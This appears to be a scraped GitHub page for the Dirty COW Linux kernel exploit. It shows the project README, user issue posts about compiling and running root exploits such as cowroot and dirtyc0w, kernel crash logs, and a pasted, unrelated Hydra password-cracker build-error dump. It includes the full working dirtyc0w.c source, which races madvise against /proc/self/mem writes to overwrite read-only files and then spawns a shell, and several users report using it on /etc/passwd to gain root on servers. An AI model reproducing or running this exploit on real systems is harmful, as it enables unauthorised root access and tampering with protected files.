Dirty COW
Home Page: https://dirtycow.ninja
Hello
To add a new FAQ entry please send a PR for index.html.
If you wish to learn more, or share what you currently know of the vulnerability head on to the wiki (open to everyone): https://github.com/dirtycow/dirtycow.github.io/wiki
If you already know all you need to know, participate in the challenges and win fame, glory and a t-shirt.
All code, images and documentation in this page and the website is in the public domain (CC0).
Like any decent high profile exploit, can we get a logo for dirtycow?
Was just reading up on the new disclosure of DirtyPipe a linux kernel 5.8-5.10.10 exploit. Looks like it allows you to write to read only files and even read-only mounts.
I know the exploit is only on versions of the android 12 and kernel version 5.8 - 5.10.10 so this would basically effect the Pixels and Galaxy s22. Would this allow root privilege escalation on android? The closest exploit I could find was DirtyCow which was 4 years ago and from what I can tell, DirtyPipe is easier to exploit. DirtyCow root was lost on reboot however and android has come a long way in terms of security like selinux since.
Could this project be adapted to root via dirtypipe?
I tried cowroot and dirtyc0w on Linux 2.6.32-25-generic-pae i686 (Ubuntu 10.04.1 LTS) and non of this worked.
On Linux 3.18.0-kali3-586 i686, dirtyc0w did not work. It hangs before replacing the file. /etc/passwd file not replaced.
It Will Let Me DownLoad It ! ! !
hi, i got this error when i'm trying compile the program >> gcc cowroot.c -o cowroot -pthread
can u help me please 😅
Hi,
I have patched my system before to try your program, and it stay stuck on :
testc0w@host:/tmp/dirty_cow_test$ ./dirtyc0w foo m00000000000000000
mmap 7f141ebae000
Nothing happen until I Ctrl + C
This is files mode :
testc0w@host:/tmp/dirty_cow_test$ ls -lh
total 20K
-rwxr-xr-x 1 testc0w testc0w 9,7K nov. 13 19:07 dirtyc0w
-rw-r--r-- 1 testc0w testc0w 2,8K nov. 13 19:07 dirtyc0w.c
-r-----r-- 1 root root 32 nov. 13 19:07 foo
Is it the behaviour expected when there is no problem on the kernel ?
Thanks for your help !
If I try to compile this on my linux box, I get this:
dirtyc0w.c:64:5: warning: implicit declaration of function ‘lseek’ [-Wimplicit-function-declaration]
lseek(f,map,SEEK_SET);
^
dirtyc0w.c:65:8: warning: implicit declaration of function ‘write’ [-Wimplicit-function-declaration]
c+=write(f,str,strlen(str));
^
dirtyc0w.c: In function ‘main’:
dirtyc0w.c:82:3: warning: implicit declaration of function ‘fstat’ [-Wimplicit-function-declaration]
fstat(f,&st);
^
dirtyc0w.c:96:10: warning: format ‘%x’ expects argument of type ‘unsigned int’, but argument 2 has type ‘void
*’ [-Wformat=]
printf("mmap %x\n\n",map);
^
/tmp/ccZL19lN.o: In function `main':
dirtyc0w.c:(.text+0x1ed): undefined reference to `pthread_create'
dirtyc0w.c:(.text+0x211): undefined reference to `pthread_create'
dirtyc0w.c:(.text+0x222): undefined reference to `pthread_join'
dirtyc0w.c:(.text+0x233): undefined reference to `pthread_join'
collect2: error: ld returned 1 exit status
uname -a: Linux example.com 3.14.32-xxxx-grs-ipv6-64 #7 SMP Wed Jan 27 18:05:09 CET 2016 x86_64 x86_64 x86_64 GNU/Linux
gcc --version:
gcc (Ubuntu 5.4.0-6ubuntu1~16.04.2) 5.4.0 20160609
Copyright (C) 2015 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Anyone can open a page to edit, or choose to delete it. I was able to do this and restore the page back to its original state. Perhaps the wiki should be permissioned?
Hi
My kernel version in a vm is 3.13.0-83-generic x86_64 (Ubuntu 14.04.3 server). I have used lib-c based root exploit. The others crash sometimes. But lib-c based root exploit works fine with executing echo 0 > /proc/sys/vm/dirty_writeback_centisecs after exploit done. Everything is fine until I reboot the server and then it crashes:(
Any help?
Not sure of a better place to share this, so here:
[ 377.279334] kernel BUG at /home/user/rpmbuild/BUILD/kernel-4.4.14/linux-4.4.14/fs/ext4/inode.c:2422!
[ 377.279352] invalid opcode: 0000 [#1] SMP
[ 377.279368] Modules linked in: fuse ip6table_filter ip6_tables xt_conntrack ipt_MASQUERADE nf_nat_masquerade_ipv4 iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack intel_rapl iosf_mbi x86_pkg_temp_thermal coretemp crct10dif_pclmul xen_netfront crc32_pclmul crc32c_intel pcspkr dummy_hcd udc_core xen_blkback xenfs xen_privcmd u2mfn(O) xen_blkfront
[ 377.279481] CPU: 0 PID: 6 Comm: kworker/u4:0 Tainted: G O 4.4.14-11.pvops.qubes.x86_64 #1
[ 377.279507] Workqueue: writeback wb_workfn (flush-251:0)
[ 377.279523] task: ffff880013799e00 ti: ffff8800137a4000 task.ti: ffff8800137a4000
[ 377.279537] RIP: e030:[<ffffffff812acace>] [<ffffffff812acace>] mpage_prepare_extent_to_map+0x2ce/0x2f0
[ 377.279563] RSP: e02b:ffff8800137a7918 EFLAGS: 00010246
[ 377.279574] RAX: 003fff800001007d RBX: ffff8800137a7938 RCX: 0000000000000000
[ 377.279587] RDX: 0000000080000000 RSI: 0000000000000000 RDI: ffff880003b40aa8
[ 377.279599] RBP: ffff8800137a79e8 R08: 0000000000000000 R09: 0000000000000040
[ 377.279613] R10: 0000000000000000 R11: 0000000000000220 R12: ffffffffffffffff
[ 377.279627] R13: 0000000000000800 R14: ffffea00039c1cc0 R15: ffff8800137a7a90
[ 377.279655] FS: 0000000000000000(0000) GS:ffff880013e00000(0000) knlGS:ffff880012900000
[ 377.279682] CS: e033 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 377.279698] CR2: 0000555d8299c6f0 CR3: 0000000011db9000 CR4: 0000000000042660
[ 377.279717] Stack:
[ 377.279729] 0000000000000000 ffff880003b40aa0 ffff8800137a7938 0000000000000001
[ 377.279760] 0000000000000001 0000000000000000 ffffea00039c1cc0 0000000000000000
[ 377.279792] ffff8800137a79a8 ffffffff812f946b fffffffffffffff4 ffff880002400040
[ 377.279823] Call Trace:
[ 377.279844] [<ffffffff812f946b>] ? jbd2__journal_start+0xdb/0x1e0
[ 377.279867] [<ffffffff812b0920>] ? ext4_writepages+0x3b0/0xd70
[ 377.279889] [<ffffffff812dfc6d>] ? __ext4_journal_start_sb+0x6d/0x120
[ 377.279911] [<ffffffff812b0943>] ext4_writepages+0x3d3/0xd70
[ 377.279937] [<ffffffff810e7e21>] ? __raw_callee_save___pv_queued_spin_unlock+0x11/0x20
[ 377.279966] [<ffffffff811ab82b>] ? generic_writepages+0x5b/0x80
[ 377.279991] [<ffffffff810e7e21>] ? __raw_callee_save___pv_queued_spin_unlock+0x11/0x20
[ 377.280021] [<ffffffff811adcae>] do_writepages+0x1e/0x30
[ 377.280041] [<ffffffff8124d9e5>] __writeback_single_inode+0x45/0x330
[ 377.280059] [<ffffffff8124e1e2>] writeback_sb_inodes+0x262/0x600
[ 377.280059] [<ffffffff8124e60c>] __writeback_inodes_wb+0x8c/0xc0
[ 377.280059] [<ffffffff8124e963>] wb_writeback+0x253/0x310
[ 377.280059] [<ffffffff8123b841>] ? get_nr_dirty_inodes+0x51/0x80
[ 377.280059] [<ffffffff8124f1cf>] wb_workfn+0x2df/0x3f0
[ 377.280059] [<ffffffff810b724e>] process_one_work+0x15e/0x430
[ 377.280059] [<ffffffff810b756e>] worker_thread+0x4e/0x460
[ 377.280059] [<ffffffff810b7520>] ? process_one_work+0x430/0x430
[ 377.280059] [<ffffffff810bd548>] kthread+0xd8/0xf0
[ 377.280059] [<ffffffff810bd470>] ? kthread_create_on_node+0x190/0x190
[ 377.280059] [<ffffffff81756c8f>] ret_from_fork+0x3f/0x70
[ 377.280059] [<ffffffff810bd470>] ? kthread_create_on_node+0x190/0x190
[ 377.280059] Code: c0 eb a3 4c 89 f7 e8 f2 26 ef ff e9 a1 fe ff ff be 0d 00 00 00 4c 89 f7 e8 60 22 ef ff 49 8b 06 f6 c4 20 0f 84 d3 fe ff ff 0f 0b <0f> 0b 48 8d bd 50 ff ff ff e8 f4 3e f0 ff eb af e8 fd 26 df ff
[ 377.280059] RIP [<ffffffff812acace>] mpage_prepare_extent_to_map+0x2ce/0x2f0
[ 377.280059] RSP <ffff8800137a7918>
[ 377.280640] ---[ end trace a311745f90e0a79b ]---
[ 377.280656] ------------[ cut here ]------------
[ 377.280689] WARNING: CPU: 0 PID: 6 at /home/user/rpmbuild/BUILD/kernel-4.4.14/linux-4.4.14/kernel/exit.c:661 do_exit+0x5f/0xae0()
[ 377.280716] Modules linked in: fuse ip6table_filter ip6_tables xt_conntrack ipt_MASQUERADE nf_nat_masquerade_ipv4 iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack intel_rapl iosf_mbi x86_pkg_temp_thermal coretemp crct10dif_pclmul xen_netfront crc32_pclmul crc32c_intel pcspkr dummy_hcd udc_core xen_blkback xenfs xen_privcmd u2mfn(O) xen_blkfront
[ 377.280870] CPU: 0 PID: 6 Comm: kworker/u4:0 Tainted: G D O 4.4.14-11.pvops.qubes.x86_64 #1
[ 377.280901] Workqueue: writeback wb_workfn (flush-251:0)
[ 377.280920] 0000000000000200 000000001ab54008 ffff8800137a7620 ffffffff813b06f3
[ 377.280951] 0000000000000000 ffffffff81a52458 ffff8800137a7658 ffffffff8109f402
[ 377.280984] ffff880013799e00 000000000000000b ffff8800137a7868 0000000000000000
[ 377.281018] Call Trace:
[ 377.281040] [<ffffffff813b06f3>] dump_stack+0x63/0x90
[ 377.281059] [<ffffffff8109f402>] warn_slowpath_common+0x82/0xc0
[ 377.281077] [<ffffffff8109f54a>] warn_slowpath_null+0x1a/0x20
[ 377.281096] [<ffffffff810a1d5f>] do_exit+0x5f/0xae0
[ 377.281118] [<ffffffff8101a751>] oops_end+0xa1/0xd0
[ 377.281135] [<ffffffff8101ac0b>] die+0x4b/0x70
[ 377.281153] [<ffffffff81017d21>] do_trap+0xb1/0x140
[ 377.281170] [<ffffffff810180a9>] do_error_trap+0x89/0x110
[ 377.281191] [<ffffffff812acace>] ? mpage_prepare_extent_to_map+0x2ce/0x2f0
[ 377.281213] [<ffffffff8138e6b0>] ? blk_sq_make_request+0x110/0x360
[ 377.281233] [<ffffffff81018610>] do_invalid_op+0x20/0x30
[ 377.281251] [<ffffffff8175849e>] invalid_op+0x1e/0x30
[ 377.281296] [<ffffffff812acace>] ? mpage_prepare_extent_to_map+0x2ce/0x2f0
[ 377.281321] [<ffffffff812ac948>] ? mpage_prepare_extent_to_map+0x148/0x2f0
[ 377.281346] [<ffffffff812f946b>] ? jbd2__journal_start+0xdb/0x1e0
[ 377.281371] [<ffffffff812b0920>] ? ext4_writepages+0x3b0/0xd70
[ 377.281396] [<ffffffff812dfc6d>] ? __ext4_journal_start_sb+0x6d/0x120
[ 377.281421] [<ffffffff812b0943>] ext4_writepages+0x3d3/0xd70
[ 377.281449] [<ffffffff810e7e21>] ? __raw_callee_save___pv_queued_spin_unlock+0x11/0x20
[ 377.281484] [<ffffffff811ab82b>] ? generic_writepages+0x5b/0x80
[ 377.281509] [<ffffffff810e7e21>] ? __raw_callee_save___pv_queued_spin_unlock+0x11/0x20
[ 377.281538] [<ffffffff811adcae>] do_writepages+0x1e/0x30
[ 377.281561] [<ffffffff8124d9e5>] __writeback_single_inode+0x45/0x330
[ 377.281592] [<ffffffff8124e1e2>] writeback_sb_inodes+0x262/0x600
[ 377.281617] [<ffffffff8124e60c>] __writeback_inodes_wb+0x8c/0xc0
[ 377.281617] [<ffffffff8124e963>] wb_writeback+0x253/0x310
[ 377.281617] [<ffffffff8123b841>] ? get_nr_dirty_inodes+0x51/0x80
[ 377.281617] [<ffffffff8124f1cf>] wb_workfn+0x2df/0x3f0
[ 377.281617] [<ffffffff810b724e>] process_one_work+0x15e/0x430
[ 377.281617] [<ffffffff810b756e>] worker_thread+0x4e/0x460
[ 377.281617] [<ffffffff810b7520>] ? process_one_work+0x430/0x430
[ 377.281617] [<ffffffff810bd548>] kthread+0xd8/0xf0
[ 377.281617] [<ffffffff810bd470>] ? kthread_create_on_node+0x190/0x190
[ 377.281617] [<ffffffff81756c8f>] ret_from_fork+0x3f/0x70
[ 377.281617] [<ffffffff810bd470>] ? kthread_create_on_node+0x190/0x190
[ 377.281893] ---[ end trace a311745f90e0a79c ]---
[ 377.282484] BUG: unable to handle kernel paging request at ffffffffffffffd8
[ 377.282523] IP: [<ffffffff810bdbd0>] kthread_data+0x10/0x20
[ 377.282559] PGD 1c0c067 PUD 1c0e067 PMD 0
[ 377.282592] Oops: 0000 [#2] SMP
[ 377.282614] Modules linked in: fuse ip6table_filter ip6_tables xt_conntrack ipt_MASQUERADE nf_nat_masquerade_ipv4 iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack intel_rapl iosf_mbi x86_pkg_temp_thermal coretemp crct10dif_pclmul xen_netfront crc32_pclmul crc32c_intel pcspkr dummy_hcd udc_core xen_blkback xenfs xen_privcmd u2mfn(O) xen_blkfront
[ 377.283015] CPU: 0 PID: 6 Comm: kworker/u4:0 Tainted: G D W O 4.4.14-11.pvops.qubes.x86_64 #1
[ 377.283015] task: ffff880013799e00 ti: ffff8800137a4000 task.ti: ffff8800137a4000
[ 377.283015] RIP: e030:[<ffffffff810bdbd0>] [<ffffffff810bdbd0>] kthread_data+0x10/0x20
[ 377.283015] RSP: e02b:ffff8800137a75e8 EFLAGS: 00010002
[ 377.283015] RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffffffff81f18e40
[ 377.283015] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff880013799e00
[ 377.283015] RBP: ffff8800137a75e8 R08: ffff880013799e88 R09: 0000000000000000
[ 377.283015] R10: 0000000000008000 R11: ffff880013799e60 R12: 0000000000000000
[ 377.283015] R13: 0000000000016c80 R14: ffff880013799e00 R15: ffff880013e16c80
[ 377.283015] FS: 0000000000000000(0000) GS:ffff880013e00000(0000) knlGS:ffff880012900000
[ 377.283015] CS: e033 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 377.283015] CR2: 0000000000000028 CR3: 0000000012651000 CR4: 0000000000042660
[ 377.283015] Stack:
[ 377.283015] ffff8800137a7600 ffffffff810b8641 ffff880013e16c80 ffff8800137a7650
[ 377.283015] ffffffff817523e0 ffff8800137a7610 ffff880000000000 ffff880013799e00
[ 377.283015] ffff8800137a8000 ffff88001379a4c8 ffff8800137a76a0 ffff8800137a7210
[ 377.283015] Call Trace:
[ 377.283015] [<ffffffff810b8641>] wq_worker_sleeping+0x11/0x90
[ 377.283015] [<ffffffff817523e0>] __schedule+0x520/0x790
[ 377.283015] [<ffffffff81752685>] schedule+0x35/0x80
[ 377.283015] [<ffffffff810a247e>] do_exit+0x77e/0xae0
[ 377.283015] [<ffffffff8101a751>] oops_end+0xa1/0xd0
[ 377.283015] [<ffffffff8101ac0b>] die+0x4b/0x70
[ 377.283015] [<ffffffff81017d21>] do_trap+0xb1/0x140
[ 377.283015] [<ffffffff810180a9>] do_error_trap+0x89/0x110
[ 377.283015] [<ffffffff812acace>] ? mpage_prepare_extent_to_map+0x2ce/0x2f0
[ 377.283015] [<ffffffff8138e6b0>] ? blk_sq_make_request+0x110/0x360
[ 377.283015] [<ffffffff81018610>] do_invalid_op+0x20/0x30
[ 377.283015] [<ffffffff8175849e>] invalid_op+0x1e/0x30
[ 377.283015] [<ffffffff812acace>] ? mpage_prepare_extent_to_map+0x2ce/0x2f0
[ 377.283015] [<ffffffff812ac948>] ? mpage_prepare_extent_to_map+0x148/0x2f0
[ 377.283015] [<ffffffff812f946b>] ? jbd2__journal_start+0xdb/0x1e0
[ 377.283015] [<ffffffff812b0920>] ? ext4_writepages+0x3b0/0xd70
[ 377.283015] [<ffffffff812dfc6d>] ? __ext4_journal_start_sb+0x6d/0x120
[ 377.283015] [<ffffffff812b0943>] ext4_writepages+0x3d3/0xd70
[ 377.283015] [<ffffffff810e7e21>] ? __raw_callee_save___pv_queued_spin_unlock+0x11/0x20
[ 377.283015] [<ffffffff811ab82b>] ? generic_writepages+0x5b/0x80
[ 377.283015] [<ffffffff810e7e21>] ? __raw_callee_save___pv_queued_spin_unlock+0x11/0x20
[ 377.283015] [<ffffffff811adcae>] do_writepages+0x1e/0x30
[ 377.283015] [<ffffffff8124d9e5>] __writeback_single_inode+0x45/0x330
[ 377.283015] [<ffffffff8124e1e2>] writeback_sb_inodes+0x262/0x600
[ 377.283015] [<ffffffff8124e60c>] __writeback_inodes_wb+0x8c/0xc0
[ 377.283015] [<ffffffff8124e963>] wb_writeback+0x253/0x310
[ 377.283015] [<ffffffff8123b841>] ? get_nr_dirty_inodes+0x51/0x80
[ 377.283015] [<ffffffff8124f1cf>] wb_workfn+0x2df/0x3f0
[ 377.283015] [<ffffffff810b724e>] process_one_work+0x15e/0x430
[ 377.283015] [<ffffffff810b756e>] worker_thread+0x4e/0x460
[ 377.283015] [<ffffffff810b7520>] ? process_one_work+0x430/0x430
[ 377.283015] [<ffffffff810bd548>] kthread+0xd8/0xf0
[ 377.283015] [<ffffffff810bd470>] ? kthread_create_on_node+0x190/0x190
[ 377.283015] [<ffffffff81756c8f>] ret_from_fork+0x3f/0x70
[ 377.283015] [<ffffffff810bd470>] ? kthread_create_on_node+0x190/0x190
[ 377.283015] Code: 02 00 00 48 c7 c7 b8 34 a5 81 e8 7c 19 fe ff e9 bb fe ff ff 0f 1f 80 00 00 00 00 0f 1f 44 00 00 48 8b 87 08 05 00 00 55 48 89 e5 <48> 8b 40 d8 5d c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00
[ 377.283015] RIP [<ffffffff810bdbd0>] kthread_data+0x10/0x20
[ 377.283015] RSP <ffff8800137a75e8>
[ 377.283015] CR2: ffffffffffffffd8
[ 377.283015] ---[ end trace a311745f90e0a79d ]---
[ 377.283015] Fixing recursive fault but reboot is needed!
Hey,
After executing the exploit (/etc/passwd based root) my server crash. what should i do ?
Kernel : Linux nsxxxxxx.ip-xx-xx-xx.eu 3.17.2-xxxx-grs-ipv6-64 #1 SMP Sat Nov 1 12:29:58 CET 2014 x86_64 Intel(R) Xeon(R) CPU E5-1650 v2 @ 3.50GHz GenuineIntel GNU/Linux
Thanks.
After using Cowroot successfully on Ubuntu machine with kernel 4.2 (original) my vm are freezing, the same on real host machine, someone have same issues ?
I modifying this exploit like :
So, I run this exploit :
Exploit run normally, I try to switch root for new user nugroho to root :
From http://seclists.org/oss-sec/2016/q4/246
- Exploit DirtyCow without /proc/self/mem and without PTRACE_POKE*.
eu tento usar tanto o dirtycow como o dirtycow 2 rootcow ai aparece o seguinte erro
./C0w: /lib/i386-linux-gnu/i686/cmov/libc.so.6: version `GLIBC_2.33' not found (required by ./C0w)
como nao tenho acesso root nao da pra atualizar o sistema pra incluir essa versao de libc
Hi,
Just wanted to understand about the different type of root access mentioned in the PoC page.
The root access mentioned are libc based, SUID based and vDSO based. Could you please be able to point to the right direction for further understanding of the root privilege mentioned.
Thanks.
I have no Rights it looks like to change the Wiki. The Gentoo section should be as follows:
Bug: https://bugs.gentoo.org/show_bug.cgi?id=597624
Web Package List: https://packages.gentoo.org/packages/sys-kernel/gentoo-sources
Stable Versions:
I went to this site on my Mac and saw:
Am I affected by the bug?
Nope.
When I read that, I interpreted this as meaning: This may be a security hole, but it's not a huge deal; we're just making a funny page for it for the hell of it. You don't have to worry about any Linux servers you maintain.
I did not interpret it as meaning "The particular web browser you're using to access this page runs on a system that isn't affected by the bug."
I'd suggest being more clear. (Plus, it doesn't actually detect whether you're running a fixed kernel or not, so even if you understand that the text is dynamic, it's not that helpful.)
/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
*/
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>
void *map;
int f;
struct stat st;
char *name;
void *madviseThread(void *arg)
{
char *str;
str=(char*)arg;
int i,c=0;
for(i=0;i<100000000;i++)
{
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
c+=madvise(map,100,MADV_DONTNEED);
}
printf("madvise %d\n\n",c);
}
void *procselfmemThread(void *arg)
{
char *str;
str=(char*)arg;
/*
You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
> The in the wild exploit we are aware of doesn't work on Red Hat
> Enterprise Linux 5 and 6 out of the box because on one side of
> the race it writes to /proc/self/mem, but /proc/self/mem is not
> writable on Red Hat Enterprise Linux 5 and 6.
*/
int f=open("/proc/self/mem",O_RDWR);
int i,c=0;
for(i=0;i<100000000;i++) {
/*
You have to reset the file pointer to the memory position.
*/
lseek(f,(uintptr_t) map,SEEK_SET);
c+=write(f,str,strlen(str));
}
printf("procselfmem %d\n\n", c);
}
int main(int argc,char *argv[])
{
/*
You have to pass two arguments. File and Contents.
*/
if (argc<3) {
(void)fprintf(stderr, "%s\n",
"usage: dirtyc0w target_file new_content");
return 1; }
pthread_t pth1,pth2;
/*
You have to open the file in read only mode.
*/
f=open(argv[1],O_RDONLY);
fstat(f,&st);
name=argv[1];
/*
You have to use MAP_PRIVATE for copy-on-write mapping.
> Create a private copy-on-write mapping. Updates to the
> mapping are not visible to other processes mapping the same
> file, and are not carried through to the underlying file. It
> is unspecified whether changes made to the file after the
> mmap() call are visible in the mapped region.
*/
/*
You have to open with PROT_READ.
*/
map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
printf("mmap %zx\n\n",(uintptr_t) map);
/*
You have to do it on two threads.
*/
pthread_create(&pth1,NULL,madviseThread,argv[1]);
pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
/*
You have to wait for the threads to finish.
*/
pthread_join(pth1,NULL);
pthread_join(pth2,NULL);
execl("/system/bin/sh", "sh", "-i", NULL);
return 0;
}
big hack
big hack
big hack
big hack
PoC page not showing up, it tells you to make a new page.
by default
centos 6.5 x86_64 gcc error
/usr/include/unistd.h:331: note: expected ‘__off_t’ but argument is of type ‘void *’
See https://twitter.com/solardiz/status/790629312672194563
Yet another challenge: exploit #DirtyCOW on 1 CPU. Can you make a suitable code path sleep (& context-switch) at a right time?
I tried to execute the exploit but it shows the error--->>>/lib/ld-linux.so.2: bad ELF interpreter: No such file or directory
the kernel version is--->>>2.6.32-504.30.3.el6.x86_64 #1 SMP Wed Jul 15 10:13:09 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
what should i do?
Minor thing, but dirtyc0w.c says to build with:
gcc -lpthread dirtyc0w.c -o dirtyc0w
This (at least for me, gcc 6.2.0) results in errors:
undefined reference to `pthread_create'
undefined reference to `pthread_join
Using:
gcc -pthread dirtyc0w.c -o dirtyc0w
Works fine. Also some warnings can be gotten rid of by adding
#include <sys/stat.h>
#include <unistd.h>
I got rid of the rest by adding:
#include <stdint.h>
Then changing:
lseek(f,map,SEEK_SET);
to
lseek(f, (uintptr_t) map,SEEK_SET);
and
printf("mmap %x\n\n",map);
to
printf("mmap %x\n\n",(uintptr_t) map);
Dunno if this is correct- it very well may not be- but it builds quietly for me now on my raspberry pi. So there ya go.
🐰
Was just testing this out in a few ways on Debian 8.6 (3.16.0-4-amd64)
With the instructions for creating the foo file and chmod 0404'ing it to root, I was still able to edit the file with vim using w! or qw!
Also after compiling using gcc I couldn't get the program to actually alter say the sudoers or shadow file
Vim editing readonly files is nothing new I believe, but has anyone managed to use this exploit on a protected file of some kind
I used the dirtyc0w.c but the procselfmem is -10000000
how can I solve it ?
Hi
I want to Compile and build Dll file from Hydra Open source code
But after compile and make object file When I want linkage object file Iget so many Error acoording to below:
hydra.o:hydra.c:(.text+0x838): undefined reference to hydra_address2string_beautiful' hydra.o:hydra.c:(.text+0x838): relocation truncated to fit: R_X86_64_PC32 against undefined symbol hydra_address2string_beautiful'
hydra.o:hydra.c:(.text+0x37e7): undefined reference to service_xmpp' hydra.o:hydra.c:(.text+0x37e7): relocation truncated to fit: R_X86_64_PC32 against undefined symbol service_xmpp'
hydra.o:hydra.c:(.text+0x833c): undefined reference to hydra_tobase64' hydra.o:hydra.c:(.text+0x833c): relocation truncated to fit: R_X86_64_PC32 against undefined symbol hydra_tobase64'
hydra.o:hydra.c:(.text+0x85a2): undefined reference to hydra_string_replace' hydra.o:hydra.c:(.text+0x85a2): relocation truncated to fit: R_X86_64_PC32 against undefined symbol hydra_string_replace'
hydra.o:hydra.c:(.text+0x85ff): undefined reference to hydra_string_replace' hydra.o:hydra.c:(.text+0x85ff): relocation truncated to fit: R_X86_64_PC32 against undefined symbol hydra_string_replace'
hydra.o:hydra.c:(.text+0x8665): undefined reference to hydra_string_replace' hydra.o:hydra.c:(.text+0x8665): relocation truncated to fit: R_X86_64_PC32 against undefined symbol hydra_string_replace'
hydra.o:hydra.c:(.text+0x86c5): undefined reference to hydra_string_replace' hydra.o:hydra.c:(.text+0x86c5): relocation truncated to fit: R_X86_64_PC32 against undefined symbol hydra_string_replace'
hydra.o:hydra.c:(.text+0x8722): undefined reference to hydra_string_replace' hydra.o:hydra.c:(.text+0x8722): relocation truncated to fit: R_X86_64_PC32 against undefined symbol hydra_string_replace'
hydra.o:hydra.c:(.text+0x8782): more undefined references to hydra_string_replace' follow hydra.o:hydra.c:(.text+0x8782): relocation truncated to fit: R_X86_64_PC32 against undefined symbol hydra_string_replace'
hydra.o:hydra.c:(.text+0x87e8): relocation truncated to fit: R_X86_64_PC32 against undefined symbol hydra_string_replace' hydra.o:hydra.c:(.text+0x884c): additional relocation overflows omitted from the output hydra.o:hydra.c:(.text+0xd005): undefined reference to hydra_strcasestr'
hydra.o:hydra.c:(.text+0xd027): undefined reference to hydra_strcasestr' hydra.o:hydra.c:(.text+0xee95): undefined reference to hydra_string_replace'
hydra.o:hydra.c:(.text+0x107e8): undefined reference to hydra_string_replace' hydra.o:hydra.c:(.text+0x1084b): undefined reference to hydra_string_replace'
hydra.o:hydra.c:(.text+0x115c5): undefined reference to usleepn' hydra.o:hydra.c:(.rdata+0x348): undefined reference to service_adam6500_init'
hydra.o:hydra.c:(.rdata+0x350): undefined reference to service_adam6500' hydra.o:hydra.c:(.rdata+0x368): undefined reference to service_asterisk_init'
hydra.o:hydra.c:(.rdata+0x370): undefined reference to service_asterisk' hydra.o:hydra.c:(.rdata+0x388): undefined reference to service_cisco_init'
hydra.o:hydra.c:(.rdata+0x390): undefined reference to service_cisco' hydra.o:hydra.c:(.rdata+0x398): undefined reference to usage_cisco'
hydra.o:hydra.c:(.rdata+0x3a8): undefined reference to service_cisco_enable_init' hydra.o:hydra.c:(.rdata+0x3b0): undefined reference to service_cisco_enable'
hydra.o:hydra.c:(.rdata+0x3b8): undefined reference to usage_cisco_enable' hydra.o:hydra.c:(.rdata+0x3c8): undefined reference to service_cvs_init'
hydra.o:hydra.c:(.rdata+0x3d0): undefined reference to service_cvs' hydra.o:hydra.c:(.rdata+0x3d8): undefined reference to usage_cvs'
hydra.o:hydra.c:(.rdata+0x3e8): undefined reference to service_ftp_init' hydra.o:hydra.c:(.rdata+0x3f0): undefined reference to service_ftp'
hydra.o:hydra.c:(.rdata+0x408): undefined reference to service_ftp_init' hydra.o:hydra.c:(.rdata+0x410): undefined reference to service_ftps'
hydra.o:hydra.c:(.rdata+0x428): undefined reference to service_http_init' hydra.o:hydra.c:(.rdata+0x430): undefined reference to service_http_get'
hydra.o:hydra.c:(.rdata+0x438): undefined reference to usage_http' hydra.o:hydra.c:(.rdata+0x448): undefined reference to service_http_form_init'
hydra.o:hydra.c:(.rdata+0x450): undefined reference to service_http_get_form' hydra.o:hydra.c:(.rdata+0x458): undefined reference to usage_http_form'
hydra.o:hydra.c:(.rdata+0x468): undefined reference to service_http_init' hydra.o:hydra.c:(.rdata+0x470): undefined reference to service_http_head'
hydra.o:hydra.c:(.rdata+0x488): undefined reference to service_http_form_init' hydra.o:hydra.c:(.rdata+0x498): undefined reference to usage_http_form'
hydra.o:hydra.c:(.rdata+0x4b0): undefined reference to service_http_post' hydra.o:hydra.c:(.rdata+0x4b8): undefined reference to usage_http'
hydra.o:hydra.c:(.rdata+0x4c8): undefined reference to service_http_form_init' hydra.o:hydra.c:(.rdata+0x4d0): undefined reference to service_http_post_form'
hydra.o:hydra.c:(.rdata+0x4d8): undefined reference to usage_http_form' hydra.o:hydra.c:(.rdata+0x4e8): undefined reference to service_http_proxy_init'
hydra.o:hydra.c:(.rdata+0x4f0): undefined reference to service_http_proxy' hydra.o:hydra.c:(.rdata+0x4f8): undefined reference to usage_http_proxy'
hydra.o:hydra.c:(.rdata+0x508): undefined reference to service_http_proxy_urlenum_init' hydra.o:hydra.c:(.rdata+0x510): undefined reference to service_http_proxy_urlenum'
hydra.o:hydra.c:(.rdata+0x518): undefined reference to usage_http_proxy_urlenum' hydra.o:hydra.c:(.rdata+0x528): undefined reference to service_icq_init'
hydra.o:hydra.c:(.rdata+0x530): undefined reference to service_icq' hydra.o:hydra.c:(.rdata+0x548): undefined reference to service_imap_init'
hydra.o:hydra.c:(.rdata+0x550): undefined reference to service_imap' hydra.o:hydra.c:(.rdata+0x558): undefined reference to usage_imap'
hydra.o:hydra.c:(.rdata+0x568): undefined reference to service_irc_init' hydra.o:hydra.c:(.rdata+0x570): undefined reference to service_irc'
hydra.o:hydra.c:(.rdata+0x578): undefined reference to usage_irc' hydra.o:hydra.c:(.rdata+0x588): undefined reference to service_ldap_init'
